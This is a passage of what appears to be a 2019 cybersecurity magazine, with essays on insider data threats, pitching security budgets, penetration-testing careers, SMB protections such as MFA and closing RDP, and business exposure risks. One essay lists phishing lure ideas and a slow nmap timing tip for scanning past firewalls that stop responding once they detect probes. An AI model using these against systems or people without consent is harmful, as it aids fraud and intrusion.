often end up inadvertently accessing private data.<br />

Unfortunately, the most common method for protecting private data is to control application access.<br />

However, this creates gaps in data governance since the protective tools are primarily about people and<br />

not the data itself. Newer methods use data classification groupings, such as data that is regulated by<br />

GDPR or HIPAA, to enable data-centric controls associated with these groupings.<br />

Responding to the increasingly, the programmable data security model employed by ALTR embeds data<br />

governance directly into applications into the critical path of every data query. This enables real-time<br />

policy checks that determines whether data should be dynamically masked, slowed down, or blocked<br />

entirely for certain user groups.<br />

Theft using privileged access<br />

Database administrators (DBAs) or IT leadership typically have access to database servers, encryption<br />

keys, and tokenization maps. These users are able to easily bypass governance. Unlike excessive<br />

privileges given to regular employees or vendors, privileged access compromise refers to the abuse of<br />

administrative rights. In this case, users with administrative credentials may access confidential<br />

information, privileged account details, sensitive personal information, or intellectual property. It is<br />

important to note that privileged credentials are also subject to theft.<br />

74


How do most organizations attempt to ensure the security of this data? They encrypt it, however, enacts<br />

a heavy performance toll on transactional data and is vulnerable because of keys. Keys often have to be<br />

stored conveniently, and once someone has the key, they are able to decrypt data. The strongest<br />

encryption methods still use a key to decrypt stored data, and even where stronger internal user controls<br />

are in place the theft of privileged credentials, or the elevation of low-access privileges, is an unmitigated<br />

threat.<br />

To address privileged access, ALTR leverages smart tokenization and fragmentation via private<br />

blockchain to obfuscate data-at-rest. Instead of encrypting and storing the data in a “secure” database<br />

with keys nearby, sensitive data is replaced at the column level with a reference hash, and then<br />

disassembled and stored in self-describing fragments. When needed, it can be reassembled at<br />

application speed with very low latency.<br />

Software or hardware misconfiguration<br />

As organizations install new hardware or transfer to a new software application, simple missteps can<br />

wreak havoc on security architecture. Insecure default configurations, incomplete configurations,<br />

unsecured cloud storage, misconfigured HTTP headers, and missed patches and upgrades are all<br />

examples of misconfigurations. In these cases, a single unchecked box might lead to devastating security<br />

holes.<br />

Most organizations today do not have structures or tools in place to solve for these security gaps.<br />

Thresholding data, which establishes limits on data consumption at the application level, is a way to<br />

approach a potential insider threat to “smash and grab” data. Insiders often need access to sensitive data<br />

to do their jobs, but the amount of access, and what they do with that access, can vary tremendously.<br />

Thresholding data enables the business to slow down and stop data exfiltration as it is happening,<br />

allowing operations to continue while validating use.<br />

In addition, a key defense in this scenario is to protect the data when it is at rest. Even if an attacker<br />

enters the network, they cannot access the data. Improving on less secure encryption keys, businesses<br />

today are also moving towards a keyless data obfuscation model such as the fragmentation technique<br />

previously mentioned.<br />

Modified database access logs<br />

Typically, a database is continuously monitored, and access logs are kept regardless of an incident.<br />

These logs identify who accessed the database, when, from what device, and include other pertinent<br />

details that are valuable in a security investigation.<br />

<strong>Cyber</strong>criminals have proven adept at modifying database access logs. Depending on their intent, they<br />

may alter them to show another user accessing the database or simply delete any evidence they were<br />

ever there.<br />

75


To identify these changes, organization must continually review the log files, a process that is prone to<br />

human error where subtle changes take place. And while the tools used to analyze them may reveal<br />

something suspicious or even an obvious breach, they are far from reliable.<br />

A technical view to removing the ability of users to modify records is gaining recognition as an alternative.<br />

This prevents users from modifying records by saving every data access event to an immutable<br />

blockchain, for example, where it cannot be altered and there is no need for complex predictive analytics<br />

and behavior monitoring.<br />

Data is everything to the enterprise<br />

Data is the raw material that fuels business, driving growth and building the future. That is why it is<br />

essential to take steps that ensure the data on which they rely is secure. Unfortunately, most<br />

organizations are reactive, operating without visibility into data flow.<br />

While humans remain the largest threat to data security, many are working tirelessly to develop new<br />

technologies to better manage our faults. Understanding the top threats to data is indispensable for<br />

identifying the right solutions.<br />

About the Author<br />

Dave Sikora is the CEO of ALTR. Dave Sikora is a technology industry veteran<br />

with more than 20 years of experience that spans enterprise software, data<br />

intelligence, private equity, mobile applications and supply chain solutions. As<br />

CEO at ALTR, he is focused on expanding the ways enterprise companies can<br />

reduce threats to data security and privacy. Sikora holds an MBA from Harvard<br />

Business School. ALTR is the first provider of programmable data security,<br />

which embeds data monitoring, governance, and at-rest protection natively into<br />

application code to provide a dramatically more effective, more portable,<br />

simpler data-security model. Using a smart database driver or API that serves<br />

as a single integration point, ALTR makes it possible for development teams to<br />

place security into the critical path of data and hand off management of<br />

governance and protection policy to security and compliance teams. Further<br />

supported by private blockchain to provide integrity to data access auditing and protected data itself, it is<br />

a completely portable approach that neutralizes data access risks from even the most privileged users<br />

while accelerating innovation and reducing the cost and complexity of data security. ALTR, which holds<br />

21 issued and allowed patents and has more than 30 patents pending, is based in Austin. Dave Sikora<br />

can be reached online at (@altrsoftware, 1-888-757-2587) and at our company website<br />

http://www.altr.com/<br />

76


How to Suggest Your Manager to Invest into <strong>Cyber</strong> <strong>Defense</strong>?<br />

By Milica D. Djekic<br />

The first personal computers would appear in the early 80s of the 20 th century. Since then the entire<br />

technological posture has changed and evolved so rapidly, so today we cannot imagine the home or<br />

business without the computing unites and the internet connection, so far. The early beginnings of the<br />

web era would go several decades to the past and with the first computer’s networks we would get the<br />

first legal regulations and frameworks regarding the cybercrime as well as cyber security. So, the cyber<br />

defense is not that young branch of the human activity and with the very first digital networks – we would<br />

get aware of the need for some cyber security procedures, tactics and strategies. Right now, the cyber<br />

defense is witnessing its boom and it’s quite obvious such an area would get publicly engaging more than<br />

even before. The reason for that could be that the machines with the internet connectivity would become<br />

the part of our everyday routine and even the most rural landscapes in so developing economies would<br />

get that privilege to rely on the web and so commonly to the entire mobile technologies service.<br />

In other words, the cyber infrastructure across the globe got so well-developed and accessible nearly<br />

anywhere worldwide, so it’s not that strange that the people would see the cyber security as so engaging<br />

area of their lives and works. Anyone who would want to know anything about the cyber defense could<br />

get such a piece of the information simply surfing on the internet or searching his social media accounts.<br />

In our experience, even the folks from the low safety and security level societies could demonstrate the<br />

77


impressive familiarity with the cyber security for a reason they would spend the hours and hours in front<br />

of their screens working so hard on their self-education in the field of the high-tech security. Indeed, those<br />

guys would so promptly develop the skill in such an arena and probably if they remain the long enough<br />

in such a business they could deal with the great expertise that could contribute to poor and unsafe<br />

countries to change for better and gain the better quality of life and work to everyone living there.<br />

<strong>Cyber</strong> defense is about a risk management<br />

So, the cyber defense would get the huge public attention through the past years and so many people<br />

over the world would wonder what such a field could offer to us. This question could offer so deep<br />

discussion as well as explanation instead of the only brief answer on. Why? The digital networks of today<br />

would serve to so many purposes and sooner or later the end users and consumers could suffer some<br />

kind of disadvantage dealing with their assets. Those drawbacks could cost them more or less in the<br />

financial connotation and everyone being rational would try to avoid paying more if he can pay less or<br />

nothing for something. Also, there are some security concerns getting correlated with the poor cyber<br />

defense, so that’s why we must pay the strong attention to those requirements. The fact is the entire IT<br />

industry would offer the information goods and services that could be the sources for the long-term<br />

exploitation needs.<br />

Apparently, the cyberspace could be so risky environment and if we do not know how to handle that risk<br />

– we would defiantly pay much, much more. Well, the role of the cyber defense is to manage the risk in<br />

the cyber domain and if we put such a threat at the reasonable scale – we would consequently pay less.<br />

It’s so complicated to mitigate the risk completely, but if you cope with the enough skill your private or<br />

business networks would be somehow secure. From this perspective, it could seem that the entire global<br />

marketplace is suffering the certain lack of the IT security professionals, but – in our opinion – such a<br />

shortage could get overcome through so intelligently created training and courses that could teach the<br />

people with the quite basic IT skills to get the cyber defense workforce. Also, never underestimate the<br />

power of the positive and constructive self-education, because the guys from the developing countries<br />

would not get the funds to pay for the expensive training and they would rather choose to sit at home and<br />

exercise on their computers on their own developing the skills that would make them getting so capable<br />

defense shield to their communities and maybe internationally if they really select to put such a big effort<br />

on, so far.<br />

Your manager is a decision maker to your effort<br />

On the other hand, if we talk about the objective needs of some organization to the cyber defense<br />

products and services, so many employees working for such an enterprise would direct you to their<br />

bosses to discuss with them anything you want to offer to such a business. Even if there is some IT<br />

security department within some firm or company – the cyber security manager would talk to his decision<br />

maker before he takes any concrete actions on. So many IT security professionals would use the welldeveloped<br />

assessment forms in order to estimate what they really need for their everyday activities and<br />

they would also need the great reporting, communications and negotiation skills in order to stress on with<br />

their managers if the entire enterprise could choose the certain way in terms of their cyber security<br />

progress, so far.<br />

78


The purpose, the impacts and the budgeting<br />

The convenient skills are needed in the business world even if you want to convince your decision makers<br />

to approve the funds and the other resources in order make the cyber security concerns getting so<br />

understandable to the rest of the team and more importantly – the workforce must know the purpose and<br />

impacts of those decisions as well as the reasons why such a budget is so necessary to that. The practice<br />

would suggest that the people would look for a remedy once they get unwell and only the very few of<br />

them would choose to prevent the conditions that got fully treatable once it got diagnosed. No one would<br />

die from the cold, but the old person which would not get treated from that condition could develop the<br />

pneumonia and certainly suffer so fatal consequences. In other words, your computer would not show<br />

any serious symptoms if it catches some virus in the cyberspace, but if you do not treat that incident in<br />

sense of cleaning your IT network from the malware using some anti-malware solution – you would<br />

sooner or later get the collapse of the entire operating system because such a malicious software would<br />

not get recognized and removed at the appropriate time.<br />

The difference between business risk and cyber risk<br />

Above all, let’s talk about the differences between the business and cyber risks and why those two terms<br />

differ from each other as well as why they could get so similar to each other. The business risk is more<br />

about investing your resources either being human or financial by their characteristics into some activity<br />

or useful work that could support you in obtaining some kind of the advantage on the marketplace. If you<br />

choose to make several risky, but profitable steps in your business – you can expect that you would<br />

expand your marketplace to much more consumers and clients. On the other hand, the cyber risk is more<br />

about how you can protect what you already have as well as prevent your organization and staffs from<br />

so serious financial and security concerns. Maybe investing into cyber defense would not impact your<br />

business advantages and new horizons on the marketplace, but you would definitely deal with the more<br />

profit at the end of the year because you would need to pay less for the occurrences being the<br />

consequence of the cyber insecurity, so far.<br />

The further thoughts<br />

The cybercrime would cost the global economy the trillions of dollars per an annum and that’s quite<br />

appealing fact. If we put such a finding into our calculation, we can notice that the real business can lose<br />

the few percents of their annual profit once they get the target of the hackers and cyber criminals. That’s<br />

the quite big waste and no one would want to throw such money through the window and give it for<br />

nothing. So, if you are the rational decision maker and if your IT security staffs deal with the adequate<br />

skills – you should defiantly get open to their suggestions as well as consult your financial risk team in<br />

order to collect the numerous helpful information and advices at the same glance before you make any<br />

move on.<br />

79


About The Author<br />

Milica D. Djekic is an Independent Researcher from Subotica,<br />

Republic of Serbia. She received her engineering background<br />

from the Faculty of Mechanical Engineering, University of<br />

Belgrade. She writes for some domestic and overseas presses<br />

and she is also the author of the book “The Internet of Things:<br />

Concept, Applications and Security” being published in 2017<br />

with the Lambert Academic Publishing. Milica is also a speaker<br />

with the BrightTALK expert’s channel and <strong>Cyber</strong> Security<br />

Summit Europe being held in 2016 as well as <strong>Cyber</strong>Central<br />

Summit <strong>2019</strong> being one of the most exclusive cyber defense<br />

events in Europe. She is the member of an ASIS International<br />

since 2017 and contributor to the Australian <strong>Cyber</strong> Security<br />

Magazine since 2018. Milica's research efforts are recognized<br />

with Computer Emergency Response Team for the European<br />

Union (CERT-EU). Her fields of interests are cyber defense,<br />

technology and business. Milica is a person with disability.<br />

80


So, Ya Wanna Be A Pen Tester, Huh?<br />

Here are some things to consider<br />

By D. Greg Scott, Author of Bullseye Breach and Virus Bomb<br />

Do you like tearing software apart and putting it back together again, stronger and better?<br />

When you watch a dramatic live TV news story from a war zone, does the news report get your attention,<br />

or do you wonder about all the ways to hack the video transmission?<br />

If you’re a Star Trek fan, when they beam aliens onto the Starship Enterprise, do weak access controls<br />

on the ship make you crazy?<br />

Do you laugh at the Hollywood hacker scenes in books and movies and want to grab the producers’ shirt<br />

collars and show them how the technology really works?<br />

If you answer yes to questions like that, you might be a natural penetration tester.<br />

Penetration testing (pen testing) means probing for weaknesses in IT networks and finding ways to exploit<br />

them before real attackers do it. Like all testing, the exercise is part science and part art-form.<br />

81


Most organizations declare a successful test when the system being tested demonstrates its capability.<br />

Testers know this is backwards. To a tester, a successful test means the test found a problem. Which<br />

means a successful pen test means the test uncovered a vulnerability. This is cause to celebrate.<br />

The best pen testers drive developers, system admins, and corporate managers nuts because they’re so<br />

good at finding problems. Which also makes them worth more than their weight in computer chip precious<br />

metals.<br />

Your Challenge<br />

But pen testers need to overcome a challenge.<br />

I surveyed a sample of pen tester job postings recently. They all want people who know a bunch of<br />

systems and languages. Some want people who know how to use the organization’s favorite tools and<br />

perform system admin functions. Excellent diagnosis and analytical skills is a common requirement.<br />

Certifications are often in the mix. And they all want somebody with strong communication skills who can<br />

work in a team.<br />

Those skills are all important, but the job postings all miss that intangible quality, that ability to sniff out<br />

weaknesses and break things. It’s a shame today’s automated resume scanners don’t have a way to<br />

capture it. It’s hard to package in a resume.<br />

So, how does a pen tester job candidate get past the automation? Fair or not, today’s resume scanners<br />

look for keywords. So, make the scanners happy and put the appropriate keywords on your resume. This<br />

should not be a problem for any experienced tester. Pass the automation gate and score an interview.<br />

The interview is where you shine. Instead of regurgitating all your experience from your resume, apply it.<br />

Ask every interviewer a zillion questions about how their departments function. For the HR rep, ask about<br />

how the HR process works. Who has permission to look at your resume? What happens if somebody<br />

unauthorized looks at it? Who protects it from tampering? For a technical hiring manager, ask about<br />

network topology, audit rules, how they store information, who has access to what, and anything else<br />

that might seem relevant. How do the right people know the network traffic coming out of here is all<br />

legitimate? How do they maintain the encryption keys for sensitive databases? What if somebody gets<br />

inside a public-facing web server and starts querying the customer database? How would they find out?<br />

Use your creativity.<br />

Their goal is to find out about you. Your goal is to learn about how stuff works around here, or how it<br />

works with a typical customer if you’re interviewing with a company that does external pen testing. The<br />

more you find out about how things work, the more you can demonstrate your knack for finding<br />

vulnerabilities.<br />

During the whole interview process, you’re running your own verbal penetration test. Smart interviewers<br />

should recognize and appreciate it. Especially if you uncover a vulnerability. And the not-so-smart<br />

interviewers—if your questions turn them off, better to find out now they’re not serious about finding<br />

problems, rather than later.<br />

82


Does the world need you?<br />

The short answer is, yes.<br />

Here are a few statistics from fall <strong>2019</strong>.<br />

• The IT Governance blog reported more than ten billion records lost to cyberattacks in the first nine<br />

months of <strong>2019</strong>. Source: https://www.itgovernance.co.uk/blog/list-of-data-breaches-and-cyberattacks-in-september-<strong>2019</strong>-531-million-records-leaked<br />

• A 2017 Clark School study at the University of Maryland found that somebody attacked computers<br />

they exposed to the internet every 39 seconds on average. Source:<br />

https://eng.umd.edu/news/story/study-hackers-attack-every-39-seconds<br />

• My own anecdotal experience over more than fifteen years of setting up custom firewalls suggests<br />

automated probes come in from around the world at least every five seconds.<br />

• The SafeAtLast blog says ransomware attacks generated at least $1 billion in revenue for<br />

attackers and cost victim organizations more than $8 billion in 2018. Source:<br />

https://safeatlast.co/blog/ransomware-statistics/<br />

The statistics are easy to find. They tell an ugly story.<br />

But forget statistics. Just listen to Warren Buffet, when he said, “I don't know that much about cyber, but<br />

I do think that's the number one problem with mankind.” (Source:<br />

https://www.businessinsider.com/warren-buffett-cybersecurity-berkshire-hathaway-meeting-2017-5)<br />

More recently, he said, “Well, I think cyber poses real risks to humanity.” (Source:<br />

https://finance.yahoo.com/news/warren-buffett-cyber-attacks-131445079.html).<br />

Typical Pen test Engagement<br />

Great, you landed the job and now you’re leading a pen test engagement. This is when it gets real. Before<br />

going any farther, make sure everyone agrees on the scope of the project.<br />

Scoping is critical. Let’s say you’ve been asked to probe, say, the HR system, and you find something<br />

that leads to, say, Manufacturing, and you follow the lead. And then something bad happens in<br />

Manufacturing. The acronym, RGE, for “resume generating event,” comes to mind. Without proper<br />

scoping, this could be one of those events. Or worse. You’re in a position of trust, and your stated mission<br />

is to find out how to make systems break. So, make sure everyone agrees on the scope of the project,<br />

and then stay in scope. If something leads beyond the scope, protect yourself by obtaining permission<br />

before following it.<br />

The best engagements, and the ones you’ll remember forever, are the ones where you find a vulnerability<br />

so big, they have to stop the whole company to fix it. Everyone will be mad at you at first, but if you do<br />

your job right, you’ll end up a hero.<br />

83


Probe wide first, and then probe deep. Deliver your report and do it all over again.<br />

A few useful tactics<br />

No pen test would be complete without a simulated social engineering attack. Start an email campaign<br />

offering free coupons and screensavers. Email people in Accounting about bogus invoices. Email people<br />

in shipping about messed up deliveries, with a click-here-for-more link. Tell people their password is<br />

compromised and click here to update it. Spear phish a few people. Use your imagination—and then run<br />

a seminar about phishing after you catch a few.<br />

Most managers’ eyes glaze over when I talk about port scans. But it’s critical that people understand<br />

what they are, and so I try to explain it using physical metaphors. I also use the Gibson Research “Shields<br />

Up” test at https://www.grc.com/x/ne.dll?bh0bkyd2.<br />

This is how I describe it.<br />

“Don’t let the word, port, freak you out. Port might be one of the most overused words in the English<br />

language. In this context, think of a port as kind of like a topic of conversation. Maybe Alice approaches<br />

Bob and says, ‘Hey Bob, let’s talk about websites.’ Except with computers, we give topics of conversation<br />

a number. If we want to talk about websites, that’s topic number 80. Secure websites are topic number<br />

443. But we don’t use the word, topic, we call it a port, and we have room for 65,535 of them. The first<br />

1024 are well known, and no, I don’t have them all memorized. I only know a few.<br />

“Anyway, now let’s put Bob in his house and Alice knocks on the front door. That’s’ kind of what happens<br />

in computer conversations. So Alice knocks on Bob’s door and says, ‘Hey Bob, let’s talk about websites.’<br />

“If you’re Bob, you have 3 choices on what to do with that request.<br />

You can acknowledge it. ‘Sure, Alice, let’s talk about websites.’<br />

You can say no; or actively deny it. ‘No Alice, not interested.’<br />

Or you can ignore it.<br />

“What do you think is the worst of those choices? It’s actively denying it, because Bob just told Alice he’s<br />

home and doesn’t want to talk. Gibson presents those with purple ‘Closed’ buttons. You don’t want that.<br />

If you don’t have whatever Alice wants to talk about, you want to ignore it. Don’t give your adversary any<br />

feedback because they’ll use it against you.”<br />

When you’re onsite selling your service and you run this test and find those “closed” boxes, use those as<br />

a teaching tool. The customer probably has a misconfigured firewall somewhere, which means the odds<br />

are reasonable your proposed pen test will also find other problems.<br />

To run a proper port scan, every pen tester should become familiar with nmap. It’s one of the most<br />

versatile weapons in the arsenal. Here’s a tactical tip. Some firewalls “hide” after a few probes and don’t<br />

respond to anything when they detect an intrusion attempt. Work around this by using the “-T0” switch,<br />

84


which nmap calls paranoid slow. Port scans will take a long time, but will be most accurate. See the nmap<br />

documentation pages for more.<br />

After probing wide with a port scan, probe deep into anything interesting the port scan finds. There are<br />

scanning tools for pretty much every application, complete with databases of the latest vulnerabilities.<br />

When probing into systems hosted at a cloud service—and this will get more and more common—also<br />

dig into the cloud service itself. You care about the thing you’re probing, but you also care about the<br />

environment in which it lives. Maybe the cloud service around the app you’re probing will have some juicy<br />

vulnerabilities. If somebody had done that with AWS and Capital One, that would have stopped a major<br />

data breach incident before it started. But make sure you stay in scope.<br />

Whatever it is you’re probing, whether it’s in a cloud or on-premise, first find out how it works, recon it,<br />

and then poke at it to make it break. Find problems, so organizations can fix them before the rest of the<br />

world finds them. That’s what pen testers do. The world needs more of you.<br />

About the Author<br />

Greg Scott is a veteran of the tumultuous IT industry. After surviving round<br />

after round of layoffs at Digital Equipment Corporation, a large computer<br />

company in its day, he branched out on his own in 1994 and started Scott<br />

Consulting. A larger firm bought Scott Consulting in 1999, just as the dot<br />

com bust devastated the IT Service industry. A glutton for punishment, he<br />

went out on his own again in late 1999 and started Infrasupport Corporation,<br />

this time with a laser focus on infrastructure and security. In late summer,<br />

2015, he accepted a job offer with an enterprise open source software<br />

company. He is author of two novels. Bullseye Breach: Anatomy of an<br />

Electronic Break-in shows how independent IT contractor, Jerry Barkley,<br />

fought back after Russian mobsters penetrated fictional retailer, Bullseye<br />

Stores, over a busy Christmas shopping season and stole forty million<br />

customer credit card numbers. In Virus Bomb, Jerry Barkley discovers a<br />

hostile country attacking the United States over the internet as a prelude to<br />

a biological attack, and finds himself again in a position to act. Real superheroes are ordinary people who<br />

step up. Even when they don’t to. Find more information at https://www.dgregscott.com/books/. Both<br />

novels are available everywhere books are sold. He lives in the Minneapolis/St. Paul metro area with his<br />

wife, daughter, and two grandchildren. He holds several IT industry certifications, including CISSP<br />

number 358671. Greg can be reached via email at gregscott@infrasupport.com, or dregscott on Twitter.<br />

Also check out his Youtube channel, “Greg Scott Public Videos.” His author website is<br />

https://www.dgregscott.com.<br />

85


Simple Ways SMBs Can Protect Themselves against <strong>Cyber</strong>-<br />

Threats<br />

By John Ford, Chief Information Security Officer, ConnectWise<br />

It seems as if every couple of weeks or so, a major news story flashes across our screens detailing a<br />

massive data breach where thousands, sometimes millions, of users’ personal information has been<br />

stolen or exposed. What each of these have in common is that they all involve large companies. Apple,<br />

Target, Marriott, British Airways – these are just a few of the more high-profile cases over the past couple<br />

of years. Just last month, Capital One was hacked and had 100 million records stolen by a former<br />

employee.<br />

But what about the ones that don’t make the news? I’m talking about small- and medium-sized<br />

businesses (SMBs), which have increasingly come under attack in recent years. While they may not<br />

dominate the headlines, 43% of cyber-attacks target small businesses, according to the Verizon <strong>2019</strong><br />

Data Breach Investigations Report.<br />

When you think about it, this shouldn’t be all that surprising. Fortune 500 companies spend tens or even<br />

hundreds of millions of dollars every year on cybersecurity. And yet, they still have security incidents to<br />

86


eport. What chance then do SMBs, many of which do the bare minimum in terms of protection, have?<br />

Small wonder they find themselves targets.<br />

However, there are some relatively simple steps SMBs can take to protect themselves without breaking<br />

the bank.<br />

The Importance of Risk Assessments<br />

Perhaps because of the intense media attention given to massive data breaches, many SMBs operate<br />

under the impression that cyber-attacks only happen to large corporations. Believing they are in no real<br />

danger, most SMBs are completely unprepared to deal with cyber-threats. Results of more than a<br />

thousand risk assessments performed by ConnectWise’s managed service provider (MSP) partners<br />

show that 69% of SMBs – and in some cases, the MSPs themselves – have not identified and<br />

documented cybersecurity threats. Two-thirds (66%) have not identified and documented cybersecurity<br />

vulnerabilities.<br />

Similarly, SMBs are ill-prepared to deal with a cyber-attack if impacted by one. Among those thousandplus<br />

assessments cited above, almost half (48%) did not have a response plan for a cybersecurity<br />

incident, while 43% lacked a recovery plan. But SMBs need to consider the risks associated if an attack<br />

were to take place. The damage to their business can be financially and reputationally devastating, and<br />

in the worst cases could even shut them down completely.<br />

Performing a cybersecurity risk assessment – or working with an MSP to perform one – is an absolutely<br />

crucial first step any SMB should take when it comes to threat protection. The old adage, “you don’t know<br />

what you don’t know” is apt here. How can you protect yourself if you don’t know what your risks are,<br />

where your vulnerabilities lie, and how to mitigate them?<br />

If working with an MSP on a risk assessment, SMBs should make sure the MSP is aligning the<br />

assessment with a well-known framework, such as the <strong>Cyber</strong>security Framework written by the National<br />

Institute of Standards and Technology (NIST). The <strong>Cyber</strong>security Framework provides a way for<br />

organizations, including SMBs, to assess security risks and provide guidelines for identifying, protecting,<br />

detecting, responding to and recovering from cyber-threats.<br />

There’s No Substitute for Good Training<br />

Something I continue to be surprised by (and not in a good way) is the lack of adequate cybersecurity<br />

training among so many organizations. The results of our MSP partners’ risk assessments show that an<br />

alarming 57% of SMBs have not informed and trained all of their users on cybersecurity. That means<br />

either they are not doing the training themselves, or their MSPs are not performing the training for them.<br />

In some cases, the MSPs themselves may not be adequately trained.<br />

Needless to say, this is not a good trend. When companies train their employees, or their customers, on<br />

cybersecurity, they are doing them a service, and hopefully that knowledge will be passed on. In that<br />

way, effective cybersecurity training can almost be considered a social good.<br />

87


When I speak to organizations about cybersecurity, I often ask, “Were you breached yesterday?”<br />

Inevitably, I get the response, “no.” But that’s not the right answer. Unless you actually were breached,<br />

the smartest answer is “To the best of my knowledge, no.”<br />

This is more of a societal problem than anything. We have become too trusting of technology to protect<br />

us, or we let our own perceived technical knowledge get in the way of common sense. It’s why phishing<br />

attacks remain a common problem. The only way to get past it is to continually educate ourselves, our<br />

employees, our customers, on the latest cybersecurity threats. And it’s not like learning algebra in high<br />

school, resting assured that knowledge will always remain the same. Being proficient in cybersecurity<br />

means regular, remedial training to keep up with the latest threats, because they are ever evolving.<br />

Using Multifactor Authentication for Good ‘Security Hygiene’<br />

There’s an analogy I like to use when talking to customers about cybersecurity. In the eighteenth century,<br />

doctors began to discover something we all take for granted these days. They learned that washing their<br />

hands before performing surgeries and other medical procedures prevented infection and saved lives. It<br />

seems so simple, right? You don’t have to be a physician to understand that washing your hands is an<br />

easy way to prevent infection and disease. And yet, not everyone does a very good job of it.<br />

So it goes with cybersecurity. We don’t always practice good “security hygiene.”<br />

The simplest thing SMBs can do to protect themselves from cyber-threats is to enable multifactor<br />

authentication. Essentially, that means having more than just a password. Most people use it all the time<br />

and never even think about it. For instance, when logging into your bank account from something other<br />

than your primary computer, and the bank sends a text message to your phone with a code. You enter<br />

the code and you’re in. That’s all multifactor authentication is. In cybersecurity, we call it “something you<br />

have and something you know.”<br />

While there are all kinds of complex products and technologies companies use to protect themselves –<br />

many of them excellent – the fact is, most ransomware attacks can be prevented by this easy-to-deploy<br />

process. Yet, multifactor authentication has only recently become widely adopted, despite having been<br />

around close to 20 years.<br />

Closing Open Ports like Remote Desktop Protocol<br />

Many SMBs are supported by MSPs via remote desktop protocol (RDP), which is a TCP connection<br />

allowing remote execution on a machine accepting credentials from the remote user. This is a good thing<br />

from a support perspective and allows MSPs to fully manage their SMB clients proactively and<br />

rapidly. But like many good things there are some risks. Unfortunately, the bad actors in the world have<br />

tools that scan for open TCP ports, and when using an unencrypted channel, they can see when an MSP<br />

is connecting to a client via RDP.<br />

It does not take much from there for bad actors to obtain the credentials that the MSP is using to access<br />

the client. At that point, they can completely take over the client machine and disable any endpoint<br />

88


protection that was in place. They can then install ransomware or other malicious code to execute their<br />

bad intentions. What can be done to prevent this? For certain, MSPs should have multi-factor<br />

authentication enabled. But they should also be using a secure connection to the client environment to<br />

ensure that all communication between the MSP and client is encrypted.<br />

In fact, if an SMB were to do only two things to improve their security posture, multifactor authentication<br />

and closing open ports like RDP are what I would recommend. These steps are easy yet effective – just<br />

like washing your hands and locking your doors.<br />

About the Author<br />

John Ford is chief information security officer for ConnectWise. His<br />

responsibilities include ensuring security education, products and services<br />

enable ConnectWise partners to own and deliver secure solutions to their<br />

customers. John, who has more than 22 years of security and technology<br />

experience, joined the ConnectWise team in 2018. Prior to that, he served<br />

for six years as founder and CEO of Sienna Group, a leading data-centric<br />

managed security services provider that was acquired by ConnectWise.<br />

John also has held CISO and CCO roles at several large healthcare,<br />

technology and government organizations, including MCS and WellCare<br />

Health Plans. He is a board member of the Tampa Bay Cloud Security<br />

Alliance Chapter. John earned a bachelor’s degree in information systems<br />

from the University of South Florida.<br />

John can be reached online at LinkedIn and at our company website http://www.connectwise.com/<br />

89


In A World of External Threats, How Are Business Putting<br />

Themselves In Jeopardy?<br />

By Stephanie Douglas, Senior Managing Director, Guidepost Solutions<br />

Just about every possible facet of your personal information can be subject to compromise: credit card<br />

or social security numbers, social media profiles, even your actual computer or mobile device. And while<br />

those breaches can seemingly turn your life upside-down, they only affect you and the people close to<br />

you. <strong>Cyber</strong>attacks focused on large organizations, on the other hand, can affect hundreds or thousands<br />

of people’s personal information and have long-lasting effects on the company’s shareholders,<br />

customers, and reputation.<br />

Recent conversations in the media and political spheres have concentrated on threats posed by foreign<br />

countries hacking and interfering in elections. The bulk of this focus has been on the Russian government<br />

but both foreign and domestic attackers can pose a serious danger to businesses. Think back to the<br />

reputational harm that Sony Pictures suffered after a hack by North Korea in October 2014 or the 2017<br />

90


WannaCry hacking that shut down hundreds of businesses and is estimated to have cost the British<br />

1, 2, 3<br />

healthcare service more than $100 million and businesses around the globe as much as $4 billion.<br />

A cyberattack doesn’t need to make headlines in order to be devastating. The theft, resale and<br />

manipulation of both private and public information can potentially have lasting impacts to every part of<br />

our business and personal lives and the number of attacks – and the corresponding impact – continues<br />

to rise. Every day, it seems, we read about another significant breach of personal data, often from<br />

companies that we implicitly trust.<br />

Perhaps most troubling is that the methods of attack keep evolving, thwarting business leaders’ attempts<br />

to keep them at bay. It seems like there are never-ending ways for hackers to expose critical information,<br />

even when organizations have undertaken significant investments in protecting that information. As the<br />

risks evolve and become more widely known, regulators, shareholders and the general public are<br />

increasingly holding executives accountable. Aside from the obvious political concerns for the U.S.,<br />

organizations should be taking these risks seriously and be thinking through efforts to protect data and<br />

their reputations from bad actors, both foreign and domestic. While many organizations are ahead of the<br />

curve when it comes to bolstering their cyber defenses, here’s how many needlessly also put themselves<br />

at risk.<br />

Providing equal-opportunity access to sensitive information. While many developed organizations<br />

practice sound data security practices by instituting role-based access for specific parts of the<br />

organization’s network and information, some early-stage and quick-growing companies do not. For<br />

these organizations, data security protocols can be slow to take hold. An expectation that everyone other<br />

than Human Resources and Finance should have access to every part of a product code or development<br />

provides wide access to sensitive company intellectual property. Having so many or even a few<br />

individuals with access to everything is an understated risk that many companies are willing to take for<br />

the sake of collaboration or product development agility. Some of the hesitancy to make the switch to<br />

role-based access can be attributed to organizational culture, but it is often an unsustainable culture in<br />

the face of a system compromise.<br />

Self-exposing too much information. As more and more executives and companies turn to social<br />

media and professional networking sites such as LinkedIn, individuals and organizations alike can<br />

potentially further their risk exposure simply by providing access to too much employee and personal<br />

information. On company websites and social profiles, organizations often highlight personal biographies<br />

and CVs of staff, investors and board members, complete with photos and cell phone numbers. While<br />

these can be a great way to celebrate employees and emphasize expertise, this information is also<br />

commonly used in the successful social engineering and targeting of individuals.<br />

1<br />

Kang, Cecila. “Sony Pictures hack cost the movie studio at least $15 million.” Washington Post. 4 February 2015.<br />

https://www.washingtonpost.com/news/business/wp/2015/02/04/sony-pictures-hack-cost-the-movie-studio-at-least-15-<br />

million/?utm_term=.d6b8ca62782a<br />

2<br />

Field, Matthew. “WannaCry cyber attack cost the NHS £92m as 19,000 appointments cancelled.” The Telegraph. 11<br />

October 2018. https://www.telegraph.co.uk/technology/2018/10/11/wannacry-cyber-attack-cost-nhs-92m-19000-<br />

appointments-cancelled/<br />

3<br />

Berr, Jonathan. “’WannaCry’ ransomware attack losses could reach $4 billion.” CBS News. 16 May 2017.<br />

https://www.cbsnews.com/news/wannacry-ransomware-attacks-wannacry-virus-losses/<br />

91


Cell phones are also becoming a more common target for hackers. Text messages with links containing<br />

malware can be easily sent to compromise personal or business devices. While many companies find<br />

that making this information publicly available is a necessity, it’s vital that employees are aware of the<br />

risks and are trained to spot potential hacking efforts.<br />

Undisciplined social media presence and response. In today’s digital world, companies are driven to<br />

use social media to engage with customers and the general public. Social media can be vital in<br />

